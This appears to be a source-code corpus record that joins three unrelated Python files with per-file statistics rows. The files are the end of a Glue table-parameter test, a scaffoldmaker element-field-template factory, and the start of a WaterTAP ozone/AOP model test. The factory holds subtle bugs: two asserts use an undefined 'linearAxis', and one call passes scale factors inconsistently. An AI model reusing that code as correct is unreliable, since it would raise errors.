'"s3://nyc-tlc/misc/*.html","s3://nyc-tlc/misc/*.zip","s3://nyc-tlc/misc/FOIL_*"]',
"objectCount": "1",
"recordCount": "342",
"sizeKey": "12322",
"skip.header.line.count": "1",
"typeOfData": "file",
},
"CreatedBy": "arn:aws:sts::172965158661:assumed-role/LakeFormationWorkflowRole/AWS-Crawler",
"IsRegisteredWithLakeFormation": False,
}
expected_table_params = {
"Name": "csv_misc",
"Owner": "owner",
"LastAccessTime": datetime.datetime(
2019, 12, 9, 16, 12, 43, tzinfo=tzlocal()
),
"Retention": 0,
"StorageDescriptor": {
"Columns": [
{"Name": "locationid", "Type": "bigint"},
{
"Name": "borough",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "service_zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
],
"Location": "s3://nyc-tlc/misc/",
"InputFormat": "org.apache.hadoop.mapred.TextInputFormat",
"OutputFormat": "org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
"Compressed": False,
"NumberOfBuckets": -1,
"SerdeInfo": {
"SerializationLibrary": "org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe",
"Parameters": {"field.delim": ","},
},
"BucketColumns": [],
"SortColumns": [],
"Parameters": {
"CrawlerSchemaDeserializerVersion": "1.0",
"CrawlerSchemaSerializerVersion": "1.0",
"UPDATED_BY_CRAWLER": "TaxiCrawler",
"areColumnsQuoted": "false",
"averageRecordSize": "36",
"classification": "csv",
"columnsOrdered": "true",
"compressionType": "none",
"delimiter": ",",
"exclusions": '["s3://nyc-tlc/misc/*foil*","s3://nyc-tlc/misc/shared*","s3://nyc-tlc/misc/uber*",'
'"s3://nyc-tlc/misc/*.html","s3://nyc-tlc/misc/*.zip","s3://nyc-tlc/misc/FOIL_*"]',
"objectCount": "1",
"recordCount": "342",
"sizeKey": "12322",
"skip.header.line.count": "1",
"typeOfData": "file",
},
"StoredAsSubDirectories": False,
},
"PartitionKeys": [],
"TableType": "EXTERNAL_TABLE",
"Parameters": {
"CrawlerSchemaDeserializerVersion": "1.0",
"CrawlerSchemaSerializerVersion": "1.0",
"UPDATED_BY_CRAWLER": "TaxiCrawler",
"areColumnsQuoted": "false",
"averageRecordSize": "36",
"classification": "csv",
"columnsOrdered": "true",
"compressionType": "none",
"delimiter": ",",
"exclusions": '["s3://nyc-tlc/misc/*foil*","s3://nyc-tlc/misc/shared*","s3://nyc-tlc/misc/uber*",'
'"s3://nyc-tlc/misc/*.html","s3://nyc-tlc/misc/*.zip","s3://nyc-tlc/misc/FOIL_*"]',
"objectCount": "1",
"recordCount": "342",
"sizeKey": "12322",
"skip.header.line.count": "1",
"typeOfData": "file",
},
}
updated_table_params = GlueStore.update_table_params(
table_params, updated_columns
)
self.assertEqual(updated_table_params, expected_table_params)
if __name__ == "__main__":
unittest.main()
| 39.22449 | 118 | 0.461498 | 869 | 11,532 | 5.998849 | 0.180667 | 0.024938 | 0.0399 | 0.05985 | 0.811241 | 0.791866 | 0.791866 | 0.769806 | 0.769806 | 0.769806 | 0 | 0.02217 | 0.374176 | 11,532 | 293 | 119 | 39.358362 | 0.700152 | 0 | 0 | 0.649254 | 0 | 0.033582 | 0.354925 | 0.123916 | 0 | 0 | 0 | 0 | 0.044776 | 1 | 0.029851 | false | 0 | 0.018657 | 0 | 0.059701 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed7c5146ef0c0d4604a9f327860e419b8df6ea7c | 25,021 | py | Python | src/scaffoldmaker/utils/eftfactory_bicubichermitelinear.py | vickieshim/scaffoldmaker | 5740b58f401b45a8c1b328e1ca0b70a08d9d13ca | [
"Apache-2.0"
] | null | null | null | src/scaffoldmaker/utils/eftfactory_bicubichermitelinear.py | vickieshim/scaffoldmaker | 5740b58f401b45a8c1b328e1ca0b70a08d9d13ca | [
"Apache-2.0"
] | null | null | null | src/scaffoldmaker/utils/eftfactory_bicubichermitelinear.py | vickieshim/scaffoldmaker | 5740b58f401b45a8c1b328e1ca0b70a08d9d13ca | [
"Apache-2.0"
] | null | null | null | '''
Definitions of standard element field templates using bicubic Hermite x linear Lagrange basis.
'''
from scaffoldmaker.utils.eft_utils import remapEftLocalNodes, remapEftNodeValueLabel, setEftScaleFactorIds
from opencmiss.zinc.element import Elementbasis, Elementfieldtemplate
from opencmiss.zinc.node import Node
from opencmiss.zinc.status import OK as ZINC_OK
class eftfactory_bicubichermitelinear:
'''
Factory class for creating element field templates for a 3-D mesh using bicubic Hermite x linear Lagrange basis.
'''
def __init__(self, mesh, useCrossDerivatives, linearAxis = 3,
d_ds1 = Node.VALUE_LABEL_D_DS1, d_ds2 = Node.VALUE_LABEL_D_DS2):
'''
:param mesh: Zinc mesh to create element field templates in.
:param useCrossDerivatives: Set to True if you want cross derivative terms.
:param linearAxis: 1, 2, or 3.
:param d_ds1: Node derivative to use in Hermite axis 1: Node.VALUE_LABEL_D_DS1, Node.VALUE_LABEL_D_DS2.
:param d_ds2: Node derivative to use in Hermite axis 2, > d_ds1: Node.VALUE_LABEL_D_DS2 or Node.VALUE_LABEL_D_DS3.
'''
assert mesh.getDimension() == 3, 'eftfactory_bicubichermitelinear: not a 3-D Zinc mesh'
assert linearAxis in [ 1, 2, 3 ], 'eftfactory_bicubichermitelinear: linearAxis must be 1, 2 or 3'
assert d_ds1 in [ Node.VALUE_LABEL_D_DS1, Node.VALUE_LABEL_D_DS2 ], 'eftfactory_bicubichermitelinear: invalid d_ds1'
assert d_ds2 in [ Node.VALUE_LABEL_D_DS2, Node.VALUE_LABEL_D_DS3 ] and (d_ds2 > d_ds1), 'eftfactory_bicubichermitelinear: invalid d_ds2'
self._mesh = mesh
self._useCrossDerivatives = useCrossDerivatives
self._linearAxis = linearAxis
self._d_ds1 = d_ds1
self._d_ds2 = d_ds2
self._d2_ds1ds2 = Node.VALUE_LABEL_D2_DS2DS3 if (d_ds1 == Node.VALUE_LABEL_D_DS2) \
else Node.VALUE_LABEL_D2_DS1DS3 if (d_ds2 == Node.VALUE_LABEL_D_DS3) \
else Node.VALUE_LABEL_D2_DS1DS2
self._fieldmodule = mesh.getFieldmodule()
self._basis = self._fieldmodule.createElementbasis(3, Elementbasis.FUNCTION_TYPE_CUBIC_HERMITE)
self._basis.setFunctionType(linearAxis, Elementbasis.FUNCTION_TYPE_LINEAR_LAGRANGE)
def _remapDefaultNodeDerivatives(self, eft):
'''
Remap the Hermite node derivatives to those chosen in __init__.
Use only on first create.
:param eft: The element field template to remap.
'''
# must do d_ds2 first!
if self._d_ds2 != Node.VALUE_LABEL_D_DS2:
remapEftNodeValueLabel(eft, range(1, 9), Node.VALUE_LABEL_D_DS2, [ (self._d_ds2, []) ])
if self._d_ds1 != Node.VALUE_LABEL_D_DS1:
remapEftNodeValueLabel(eft, range(1, 9), Node.VALUE_LABEL_D_DS1, [ (self._d_ds1, []) ])
if self._d2_ds1ds2 != Node.VALUE_LABEL_D2_DS1DS2:
remapEftNodeValueLabel(eft, range(1, 9), Node.VALUE_LABEL_D2_DS1DS2, [ (self._d2_ds1ds2, []) ])
def createEftBasic(self):
'''
Create the basic biicubic Hermite x linear Lagrange element template with 1:1 mappings to
node derivatives ds1 & ds2, with or without cross derivatives accordinate as initialised.
:return: Element field template
'''
if not self._useCrossDerivatives:
return self.createEftNoCrossDerivatives()
eft = self._mesh.createElementfieldtemplate(self._basis)
self._remapDefaultNodeDerivatives(eft)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftBasic: Failed to validate eft'
return eft
def createEftNoCrossDerivatives(self):
'''
Create a basic tricubic hermite element template with 1:1 mappings to
node derivatives ds1 & ds2, without cross derivatives.
:return: Element field template
'''
eft = self._mesh.createElementfieldtemplate(self._basis)
for n in range(8):
eft.setFunctionNumberOfTerms(n*4 + 4, 0)
self._remapDefaultNodeDerivatives(eft)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftNoCrossDerivatives: Failed to validate eft'
return eft
def createEftShellPoleBottom(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for closing bottom pole of a shell.
Element is collapsed in xi1 on xi2 = 0.
Each collapsed node has 3 scale factors giving the cos, sin coefficients
of the radial line from global derivatives, plus the arc subtended by
the element in radians, so the pole can be rounded.
Need to create a new template for each sector around pole giving common
nodeScaleFactorOffset values on common faces. Suggestion is to start at 0 and
add 100 for each radial line around pole.
:param nodeScaleFactorOffset0: offset of node scale factors at pole on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at pole on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear to remap D2_DS1DS2 at pole
eft = self._mesh.createElementfieldtemplate(self._basis)
if not self._useCrossDerivatives:
for n in [ 2, 3, 6, 7 ]:
eft.setFunctionNumberOfTerms(n*4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3,
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3 ])
# remap parameters before collapsing nodes
remapEftNodeValueLabel(eft, [ 1, 2, 5, 6 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
so = layer*6 + 1
ln = layer*4 + 1
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 1]), (Node.VALUE_LABEL_D_DS2, [so + 2]) ])
# 2 terms for cross derivative 1 2 to correct circular pole: -sin(theta).phi, cos(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 2, so + 3]), (Node.VALUE_LABEL_D_DS2, [1, so + 1, so + 3]) ])
ln = layer*4 + 2
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 4]), (Node.VALUE_LABEL_D_DS2, [so + 5]) ])
# 2 terms for cross derivative 1 2 to correct circular pole: -sin(theta).phi, cos(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 5, so + 6]), (Node.VALUE_LABEL_D_DS2, [1, so + 4, so + 6]) ])
ln_map = [ 1, 1, 2, 3, 4, 4, 5, 6 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_tricubichermite.createEftShellPoleBottom: Failed to validate eft'
return eft
def createEftShellPoleTop(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for closing top pole of a shell.
Element is collapsed in xi1 on xi2 = 1.
Each collapsed node has 3 scale factors giving the cos, sin coefficients
of the radial line from global derivatives, plus the arc subtended by
the element in radians, so the pole can be rounded.
Need to create a new template for each sector around pole giving common
nodeScaleFactorOffset values on common faces. Suggestion is to start at 0 and
add 100 for each radial line around pole.
:param nodeScaleFactorOffset0: offset of node scale factors at pole on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at pole on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear to remap D2_DS1DS2 at pole
eft = self._mesh.createElementfieldtemplate(self._basis)
if not self._useCrossDerivatives:
for n in [ 0, 1, 4, 5 ]:
eft.setFunctionNumberOfTerms(n*4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3,
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3 ])
# remap parameters before collapsing nodes
remapEftNodeValueLabel(eft, [ 3, 4, 7, 8 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
so = layer*6 + 1
ln = layer*4 + 3
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2, [ (Node.VALUE_LABEL_D_DS1, [so + 1]), (Node.VALUE_LABEL_D_DS2, [so + 2]) ])
# 2 terms for cross derivative 1 2 to correct circular pole: -sin(theta).phi, cos(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2, [ (Node.VALUE_LABEL_D_DS1, [1, so + 2, so + 3]), (Node.VALUE_LABEL_D_DS2, [so + 1, so + 3]) ])
ln = layer*4 + 4
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2, [ (Node.VALUE_LABEL_D_DS1, so + 4), (Node.VALUE_LABEL_D_DS2, so + 5) ])
# 2 terms for cross derivative 1 2 to correct circular pole: -sin(theta).phi, cos(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2, [ (Node.VALUE_LABEL_D_DS1, [1, so + 5, so + 6]), (Node.VALUE_LABEL_D_DS2, [so + 4, so + 6]) ])
ln_map = [ 1, 2, 3, 3, 4, 5, 6, 6 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_tricubichermite.createEftShellPoleTop: Failed to validate eft'
return eft
def createEftSplitXi1RightStraight(self):
'''
Create an element field template suitable for the inner elements of the
join between left and right chambers, with xi1 bifurcating to right.
Straight through version.
Only works with linearAxis 2.
:return: Element field template
'''
assert linearAxis == 2, 'eftfactory_bicubichermitelinear.createEftSplitXi1RightStraight: Not linearAxis 2'
eft = self.createEftNoCrossDerivatives()
setEftScaleFactorIds(eft, [1], [])
remapEftNodeValueLabel(eft, [ 5, 7 ], self._d_ds1, [ (self._d_ds1, []), (self._d_ds2, [1]) ])
remapEftNodeValueLabel(eft, [ 6, 8 ], self._d_ds1, [ (self._d_ds1, []), (self._d_ds2, []) ])
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftSplitXi1RightStraight: Failed to validate eft'
return eft
def createEftSplitXi1RightOut(self):
'''
Create an element field template suitable for the outer elements of the
join between left and right chambers, with xi1 bifurcating to right.
Right out version i.e. xi1 heading to right. h-shape.
Only works with linearAxis 2.
:return: Element field template
'''
assert linearAxis == 2, 'eftfactory_bicubichermitelinear.createEftSplitXi1RightOut: Not linearAxis 2'
eft = self.createEftNoCrossDerivatives()
setEftScaleFactorIds(eft, [1], [])
remapEftNodeValueLabel(eft, [ 1, 3 ], self._d_ds1, [ (self._d_ds1, [1]) ])
remapEftNodeValueLabel(eft, [ 1, 3 ], self._d_ds2, [ (self._d_ds1, [1]), (self._d_ds2, [1]) ])
remapEftNodeValueLabel(eft, [ 5, 7 ], self._d_ds2, [ (self._d_ds1, [1]), (self._d_ds2, []) ])
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftSplitXi1RightOut: Failed to validate eft'
return eft
def createEftOpenTube(self):
'''
Create a basic bicubic hermite linear element template for elements
along boundary where a tube is opened on xi1 = 1 for a flat preparation.
Could eventually have 6 variants. Retain node numbering with two versions
for boundary nodes.
:return: Element field template
'''
eft = self.createEftBasic()
for n in [ 1, 3, 5, 7 ]:
ln = n + 1
eft.setTermNodeParameter(n*4 + 1, 1, ln, Node.VALUE_LABEL_VALUE, 2)
eft.setTermNodeParameter(n*4 + 2, 1, ln, Node.VALUE_LABEL_D_DS1, 2)
eft.setTermNodeParameter(n*4 + 3, 1, ln, Node.VALUE_LABEL_D_DS2, 2)
if self._useCrossDerivatives:
eft.setTermNodeParameter(n*4 + 4, 1, ln, Node.VALUE_LABEL_D2_DS1DS2, 2)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftOpenTube: Failed to validate eft'
return eft
def createEftWedgeXi1One(self):
'''
Create a basic bicubic hermite linear element template for elements
along boundary of tenia coli where nodes on xi1 = 1 are collapsed.
:return: Element field template
'''
eft = self.createEftBasic()
ln_map = [ 1, 2, 3, 4, 5, 2, 6, 4 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_tricubichermite.createEftWedgeXi1One: Failed to validate eft'
return eft
def createEftWedgeXi1Zero(self):
'''
Create a basic bicubic hermite linear element template for elements
along boundary of tenia coli where nodes on xi1 = 0 are collapsed.
:return: Element field template
'''
eft = self.createEftBasic()
ln_map = [ 1, 2, 3, 4, 1, 5, 3, 6 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_tricubichermite.createEftWedgeXi1Zero: Failed to validate eft'
return eft
def createEftWedgeXi1ZeroOpenTube(self):
'''
Create a basic bicubic hermite linear element template for elements
along boundary of tenia coli where nodes on xi1 = 0 are collapsed
where a tube is opened on xi1 = 1 for a flat preparation.
:return: Element field template
'''
eft = self.createEftBasic()
for n in [ 1, 3, 5, 7 ]:
ln = n + 1
eft.setTermNodeParameter(n*4 + 1, 1, ln, Node.VALUE_LABEL_VALUE, 2)
eft.setTermNodeParameter(n*4 + 2, 1, ln, Node.VALUE_LABEL_D_DS1, 2)
eft.setTermNodeParameter(n*4 + 3, 1, ln, Node.VALUE_LABEL_D_DS2, 2)
if self._useCrossDerivatives:
eft.setTermNodeParameter(n*4 + 4, 1, ln, Node.VALUE_LABEL_D2_DS1DS2, 2)
ln_map = [ 1, 2, 3, 4, 1, 5, 3, 6 ]
remapEftLocalNodes(eft, 6, ln_map)
assert eft.validate(), 'eftfactory_tricubichermite.createEftWedgeXi1ZeroOpenTube: Failed to validate eft'
return eft
def createEftTetrahedronXi1One(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for a solid tetrahedron for the apex of cecum,
with xi1 and xi3 collapsed on xi2 = 0, and xi3 collapsed on xi1 = 1 and xi2 = 1.
Each collapsed node on xi2 = 0 has 3 scale factors giving the cos, sin coefficients of
the radial line from global derivatives, plus the arc subtended by the element in radians,
so the circumferential direction is rounded.
Need to create a new template for each sector around axis giving common
nodeScaleFactorOffset values on common faces. Suggestion is to start at 0 and
add 10000 for each radial line around axis.
:param nodeScaleFactorOffset0: offset of node scale factors at axis on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at axis on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear
eft = self._mesh.createElementfieldtemplate(self._basis)
for n in [ 2, 3, 6, 7 ]:
eft.setFunctionNumberOfTerms(n * 4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3 ] )
# remap parameters on xi2 = 0 before collapsing nodes
remapEftNodeValueLabel(eft, [ 1, 2, 5, 6 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
soAround = 1
ln = layer * 4 + 1
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 1]),
(Node.VALUE_LABEL_D_DS2, [soAround + 2])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 2, soAround + 3]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 1, soAround + 3])])
ln = layer * 4 + 2
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 4]),
(Node.VALUE_LABEL_D_DS2, [soAround + 5])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 5, soAround + 6]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 4, soAround + 6])])
ln_map = [ 1, 1, 2, 3, 1, 1, 4, 3]
remapEftLocalNodes(eft, 4, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftTetrahedronXi1One: Failed to validate eft'
return eft
def createEftTetrahedronXi1Zero(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for a solid tetrahedron for the apex of cecum,
with xi1 and xi3 collapsed on xi2 = 0, and xi3 collapsed on xi1 = 0, xi2 = 1.
Each collapsed node on xi2 = 0 has 3 scale factors giving the cos, sin coefficients of
the radial line from global derivatives, plus the arc subtended by the element in radians,
so the circumferential direction is rounded.
Need to create a new template for each sector around axis giving common
nodeScaleFactorOffset values on common faces. Suggestion is to start at 0 and
add 10000 for each radial line around axis.
:param nodeScaleFactorOffset0: offset of node scale factors at axis on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at axis on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear
eft = self._mesh.createElementfieldtemplate(self._basis)
for n in [ 2, 3, 6, 7 ]:
eft.setFunctionNumberOfTerms(n * 4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3 ])
# remap parameters on xi2 = 0 before collapsing nodes
remapEftNodeValueLabel(eft, [ 1, 2, 5, 6 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
soAround = 1
ln = layer * 4 + 1
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 1]),
(Node.VALUE_LABEL_D_DS2, [soAround + 2])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 2, soAround + 3]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 1, soAround + 3])])
ln = layer * 4 + 2
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 4]),
(Node.VALUE_LABEL_D_DS2, [soAround + 5])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ln], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 5, soAround + 6]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 4, soAround + 6])])
ln_map = [ 1, 1, 2, 3, 1, 1, 2, 4]
remapEftLocalNodes(eft, 4, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftTetrahedronXi1Zero: Failed to validate eft'
return eft
def createEftPyramidBottomSimple(self, nodeScaleFactorOffset0, nodeScaleFactorOffset1):
'''
Create a bicubic hermite linear element field for a solid pyramid for elements within
a tenia coli joining to the cecal apex, with xi1 and xi3 collapsed on xi2 = 0.
Each collapsed node has 3 scale factors giving the cos, sin coefficients of the
radial line from global derivatives, plus the arc subtended by the element in radians,
so the circumferential direction is rounded. Need to create a new template for each
sector around axis giving common nodeScaleFactorOffset values on common faces.
Suggestion is to start at 0 and add 10000 for each radial line around axis.
:param nodeScaleFactorOffset0: offset of node scale factors at axis on xi1=0
:param nodeScaleFactorOffset1: offset of node scale factors at axis on xi1=1
:return: Element field template
'''
# start with full bicubic hermite linear
eft = self._mesh.createElementfieldtemplate(self._basis)
for n in [ 2, 3, 6, 7 ]:
eft.setFunctionNumberOfTerms(n * 4 + 4, 0)
# GRC: allow scale factor identifier for global -1.0 to be prescribed
setEftScaleFactorIds(eft, [1], [
nodeScaleFactorOffset0 + 1, nodeScaleFactorOffset0 + 2, nodeScaleFactorOffset0 + 3,
nodeScaleFactorOffset1 + 1, nodeScaleFactorOffset1 + 2, nodeScaleFactorOffset1 + 3])
# remap parameters on xi2 = 0 before collapsing nodes
remapEftNodeValueLabel(eft, [ 1, 2, 5, 6 ], Node.VALUE_LABEL_D_DS1, [])
for layer in range(2):
soAround = 1
ln = layer * 4 + 1
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 1]), (Node.VALUE_LABEL_D_DS2, [soAround + 2])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 2, soAround + 3]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 1, soAround + 3])])
ln = layer * 4 + 2
# 2 terms for d/dxi2 via general linear map:
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D_DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 4]), (Node.VALUE_LABEL_D_DS2, [soAround + 5])])
# 2 terms for cross derivative 1 2 to correct circular apex: cos(theta).phi, -sin(theta).phi
remapEftNodeValueLabel(eft, [ ln ], Node.VALUE_LABEL_D2_DS1DS2,
[(Node.VALUE_LABEL_D_DS1, [soAround + 5, soAround + 6]),
(Node.VALUE_LABEL_D_DS2, [1, soAround + 4, soAround + 6])])
ln_map = [ 1, 1, 2, 3, 1, 1, 4, 5 ]
remapEftLocalNodes(eft, 5, ln_map)
assert eft.validate(), 'eftfactory_bicubichermitelinear.createEftPyramidBottomSimple: Failed to validate eft'
return eft
| 57.652074 | 170 | 0.644499 | 3,110 | 25,021 | 5.048553 | 0.080064 | 0.053882 | 0.083816 | 0.071651 | 0.842749 | 0.834533 | 0.820776 | 0.763964 | 0.743328 | 0.717407 | 0 | 0.043593 | 0.272971 | 25,021 | 433 | 171 | 57.785219 | 0.819526 | 0.331641 | 0 | 0.629464 | 0 | 0 | 0.088366 | 0.06129 | 0 | 0 | 0 | 0 | 0.084821 | 1 | 0.066964 | false | 0 | 0.017857 | 0 | 0.151786 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
71f8d9685f2b872481ade8f59bd3b9f0792b445f | 15,985 | py | Python | watertap/unit_models/zero_order/tests/test_ozone_aop_zo.py | kurbansitterley/watertap | 1a8986a779bdcb36f1481f03eed24c6c42d26481 | [
"BSD-3-Clause-LBNL"
] | null | null | null | watertap/unit_models/zero_order/tests/test_ozone_aop_zo.py | kurbansitterley/watertap | 1a8986a779bdcb36f1481f03eed24c6c42d26481 | [
"BSD-3-Clause-LBNL"
] | null | null | null | watertap/unit_models/zero_order/tests/test_ozone_aop_zo.py | kurbansitterley/watertap | 1a8986a779bdcb36f1481f03eed24c6c42d26481 | [
"BSD-3-Clause-LBNL"
] | null | null | null | ###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
"""
Tests for zero-order Ozone/AOP model
"""
import pytest
from pyomo.environ import (
check_optimal_termination,
ConcreteModel,
Constraint,
value,
Var,
Block,
)
from pyomo.util.check_units import assert_units_consistent
from idaes.core import FlowsheetBlock
from idaes.core.util.exceptions import ConfigurationError
from idaes.core.solvers import get_solver
from idaes.core.util.model_statistics import degrees_of_freedom
from idaes.core.util.testing import initialization_tester
from idaes.core import UnitModelCostingBlock
from watertap.unit_models.zero_order import OzoneAOPZO
from watertap.core.wt_database import Database
from watertap.core.zero_order_properties import WaterParameterBlock
from watertap.core.zero_order_costing import ZeroOrderCosting
solver = get_solver()
class TestOzoneAOPZO_with_default_removal:
@pytest.fixture(scope="class")
def model(self):
m = ConcreteModel()
m.db = Database()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = WaterParameterBlock(
default={
"solute_list": [
"cryptosporidium",
"toc",
"giardia_lamblia",
"eeq",
"total_coliforms_fecal_ecoli",
"viruses_enteric",
"tss",
]
}
)
